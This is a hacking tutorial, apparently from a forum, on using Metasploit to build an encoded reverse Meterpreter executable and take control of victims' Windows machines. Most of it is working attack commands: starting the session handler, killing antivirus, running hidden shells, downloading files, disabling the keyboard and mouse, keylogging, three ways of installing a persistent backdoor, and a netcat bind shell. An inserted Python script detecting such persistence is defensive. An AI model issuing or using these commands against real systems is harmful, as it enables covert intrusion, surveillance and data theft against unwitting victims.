I introduce my tutorial on the Metasploit Framework. This applies to both Linux and Windows.
Although, I would seriously suggest using Metasploit within Linux, specifically
'Backtrack 4 - PreRelease' (the latest).
If you don't know what the Metasploit Framework is, then look it up. You've been missing out.
In no way is this meant to be a comprehensive guide. MSF is HUGE. Too many things can be done with it;
you could write 15 books on it. MSF is open source and coded in the Ruby language.
Get used to the 'help' option!
I'm gonna start with payloads. Many people know already that MSF is an exploitation framework, as in you can
work out vulnerabilities in software and use the framework to quickly create working exploits for them.
There are hundreds of payloads that you can choose from, so that when you exploit the system in question
you can easily automate the execution of a payload of your choice on the machine.
I will show you how to turn those payloads into an actual .EXE so it will just run as is.
OK. Let's begin:
Fire up your MSF and make sure it's updated, as they are constantly making amendments to it.
For BackTrack I think it's: cd pentest/exploits/framework3
Metasploit Double Encoded Reverse Meterpreter Payload
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=123.234.456.678 LPORT=82 R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o /meterpreter_reverse.exe
LHOST - is our machine (listening host), as we are waiting for a connection from RHOST (remote host).
LPORT - self explanatory. Just make sure you have port forwarding set up on your router, of course.
Meterpreter - An incredibly advanced shell which kind of simulates bash (even on a Windows system). Lots of power.
You'll see how much power shortly.
Now you have your PAYLOAD.exe.
In the /framework3 directory, start the console
(takes a little while for this to load):
use exploit/multi/handler (sets the exploit to a handler)
set PAYLOAD windows/meterpreter/reverse_tcp (most common payload to use; try experimenting with others)
set LHOST 126.96.36.199 (make sure you set LHOST to your address on the network and not localhost)
set LPORT 82 (sometimes port 80, 443 or 8080 is better, as to some firewalls it looks less suspicious)
set ExitOnSession false (as soon as you get a session, it doesn't automatically jump into it)
set AutoRunScript /killav.rb (when the customer connects back and the meterpreter payload is uploaded, the killav.rb script is uploaded and executed)
exploit -j (sets the exploit up as a job; good for shells on multiple customers)
(See more on scripts below.)
When all goes well, you have hit 'exploit -j' and have waited for a customer to click on the payload.exe you created earlier,
you will see stuff happening on the screen. You will notice it run the killav script, then say something like:
- Meterpreter session 1 opened (123.234.345.567:63456 -> 192.168.1.50:82)
OK, here are the basics:
sessions -l (this lists any sessions we have, i.e. customers. Notice the lowercase L)
sessions -i 1 (this is to interact with session 1. i.e. Interact. Lowercase I)
If you need to come out of this screen, either press CTRL+Z or type 'background' without the ''.
OK, so we are in the session. Brilliant.
Continuation - The Good Stuff
$ Meterpreter > getuid (this will show you the currently logged-in user)
$ Meterpreter > idletime (wanna see how long the user has been AFK?)
$ Meterpreter > help (this will show you a massive list of amazing commands to use!)
$ Meterpreter > use priv (then check help again; more privileged commands now, eh?)
OK, I will show some really handy ones:
$ Meterpreter > upload evil.exe evil.exe (uploads the file from this machine over to the customer)
$ Meterpreter > download secret.txt secret.txt (downloads the txt file to our machine)
$ Meterpreter > cd "Documents and Settings" (cd's to a folder with spaces in it)
$ Meterpreter > ls (this is an example of the bash-type commands we have on the target Windows machine; the version of dir)
$ Meterpreter > download -r "My Documents" /home/root/Documents (this would download the entire "My Docs" folder over to us)
$ Meterpreter > execute -f evil.exe (executes the file on the customer)
$ Meterpreter > execute -f cmd.exe -c -H -i (-f executes, cmd.exe shell on target; -c channelized, -H hidden, -i interactive)
(The customer will not see a thing you're doing as all the options are set properly.)
Check further down for some cmd.exe commands that are very useful.
$ Meterpreter > uictl disable keyboard (disables some user interface components)
$ Meterpreter > uictl disable mouse
$ Meterpreter > uictl enable keyboard (enables)
$ Meterpreter > ps (this will show you a detailed list of all processes running on the target machine)
$ Meterpreter > migrate pid (migrates/injects itself into another process id), e.g. migrate 716 (explorer.exe)
$ Meterpreter > kill pid (kills a process), e.g. kill 563 (av.exe goes down)
etc. etc.
Using Payload As A Backdoor
upload /home/metabkdr.exe metabkdr.exe (to the Application Data directory)
execute -f cmd.exe -c -H -i
Way 1:
cmd.exe > REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe" /f
(This adds a registry startup entry, obviously.)
Way 2:
cmd.exe > at 19:00 /every:M,T,W,Th,F cmd /c start "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe"
(Runs the backdoor at 7pm every weekday; the at command works on all Windows versions, I think.)
Way 3:
cmd.exe > SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe" /ED 11/11/2011
(This runs the backdoor every 45 mins as SYSTEM on XP. XP Home doesn't have schtasks, but it has 'at'.)
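The defender's view of these three persistence methods, as an added example that is not from the original tutorial: the Python below audits Run-key values and scheduled-task rows for the traits the entries above share, a binary under a user-writable directory, a decoy name like "firewall", and a SYSTEM task on a short repeat interval. The sample records are constructed to mirror the tutorial's entries; the regex and decoy-name list are assumptions you would tune to your own environment.

```python
import re
# Paths an unprivileged user can write to; an autostart entry pointing here is a red flag (assumed list).
USER_WRITABLE = re.compile(r"\\(Application Data|AppData|Temp)\\", re.IGNORECASE)
# Entry names chosen to look like security or system components (the tutorial uses "firewall").
DECOY_NAMES = {"firewall", "antivirus", "windows update", "svchost"}

def exe_path(command):
    """Return the executable part of a command string, honouring a quoted path."""
    m = re.match(r'"([^"]*)"|(\S+)', command.strip())
    return (m.group(1) or m.group(2) or "") if m else ""

def audit_run_key(values):
    """values: (name, data) pairs as read from HKCU\\...\\CurrentVersion\\Run."""
    findings = []
    for name, data in values:
        reasons = []
        if USER_WRITABLE.search(exe_path(data)):
            reasons.append("executable in user-writable directory")
        if name.lower() in DECOY_NAMES:
            reasons.append("decoy value name")
        if reasons:
            findings.append((name, reasons))
    return findings

def audit_tasks(tasks):
    """tasks: dicts with the TaskName, RunAsUser, ScheduleType and TaskToRun columns of schtasks /query."""
    findings = []
    for t in tasks:
        reasons = []
        if USER_WRITABLE.search(exe_path(t["TaskToRun"])):
            reasons.append("task binary in user-writable directory")
        if t["RunAsUser"].upper() == "SYSTEM" and t["ScheduleType"].lower() in ("minute", "hourly"):
            reasons.append("runs as SYSTEM on a short repeat interval")
        if reasons:
            findings.append((t["TaskName"], reasons))
    return findings

# Constructed sample data: the tutorial's two persistence entries plus two benign ones.
BACKDOOR = r'"C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe"'
SAMPLE_RUN_VALUES = [("firewall", BACKDOOR), ("ctfmon.exe", r"C:\WINDOWS\system32\ctfmon.exe")]
SAMPLE_TASKS = [
    {"TaskName": "FIREWALL", "RunAsUser": "SYSTEM", "ScheduleType": "Minute", "TaskToRun": BACKDOOR},
    {"TaskName": "Backup", "RunAsUser": "Owner", "ScheduleType": "Daily",
     "TaskToRun": r"C:\Program Files\Backup\backup.exe /quiet"},
]

if __name__ == "__main__":
    for name, reasons in audit_run_key(SAMPLE_RUN_VALUES) + audit_tasks(SAMPLE_TASKS):
        print("SUSPECT", name + ":", "; ".join(reasons))
```

On a real host, feed it the output of reg query on the Run keys and schtasks /query /fo csv /v instead of the constructed samples.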
Plant A Simple Backdoor with Netcat
A very simple way of planting a backdoor could be using netcat.
1. Upload a netcat executable (nc.exe) to the remote machine.
Meterpreter provides the 'upload' command for that.
2. c:\windows\system32 > nc.exe -l -L -p <port number> -e cmd.exe
3. Now from your machine, type nc -v -n <ip address> <port>
It will give you a command shell on the remote machine.
An alternative form of the listener:
nc -l -d -p 80 -e c:\windows\system32\cmd.exe
More On Scripts:
Scripts can be run from the meterpreter shell when you have a shell on a customer.
All you do is (where '$' is not to be typed; this is the meterpreter prompt):
$ run scraper -h (this will show you the options etc. for any of the scripts)
$ run keylogrecorder -h
The sky is the limit when it comes to scripts. You can code them to do all sorts of stuff for you.
There are many already within the framework, made by folk. Here's a small list of some already there:
killav.rb (kills all anti-virus products running on the system)
getcountermeasure.rb (kills AVs and firewalls/IDSes)
scraper.rb (logs LOADS of useful information via a series of automated commands on the customer. Logs are stored in /root/.msf3/)
gettelnet.rb (able to open a telnet server on the customer with a username and password)
checkvm.rb (checks to see if it is a VM, and version numbers)
Credits: backtrack forums / metasploit /irongeek